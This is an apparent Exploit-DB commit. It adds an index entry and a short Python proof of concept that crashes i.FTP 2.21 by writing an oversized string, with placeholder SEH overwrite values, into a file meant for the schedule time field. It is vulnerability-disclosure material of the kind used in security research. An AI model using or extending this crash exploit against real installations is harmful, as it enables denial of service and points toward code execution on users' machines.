DB: 2015-04-29

1 new exploits
2015-04-29 05:02:03 +00:00 · 2015-04-29 05:02:03 +00:00 · 428ec4393d
commit 428ec4393d
parent 67447e4b29
2 changed files with 23 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -33240,3 +33240,4 @@ id,file,description,date,author,platform,type,port
 36839,platforms/multiple/remote/36839.py,"MiniUPnPd 1.0 - Stack Overflow RCE for AirTies RT Series (MIPS)",2015-04-27,"Onur Alanbel (BGA)",multiple,remote,0
 36841,platforms/windows/local/36841.py,"UniPDF Version 1.2 - 'xml' Buffer Overflow Crash PoC",2015-04-27,"Avinash Thapa",windows,local,0
 36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0
+36847,platforms/windows/dos/36847.py,"i.FTP 2.21 SEH Overflow Crash PoC",2015-04-28,"Avinash Thapa",windows,dos,0
--- a/platforms/windows/dos/36847.py
+++ b/platforms/windows/dos/36847.py
@ -0,0 +1,22 @@
+# iFTP 2.21 SEH overwritten Crash PoC
+# Author: Avinash Kumar Thapa "-Acid"
+# Date of Testing :  28th April'2015
+# Vendor's home page: http://www.memecode.com/iftp.php
+# Software's Url: http://www.memecode.com/data/iftp-win32-v2.21.exe
+# Crash Point: Go to Schedule > Schedule download > {+} >Time field
+
+
+buffer = "A"*600
+
+buffer += "BBBB" # Pointer to Next SEH Record
+
+buffer += "CCCC" # SEH HANDLER
+
+
+file = "test.txt"
+
+f = open(file, "w")
+
+f.write(buffer)
+
+f.close()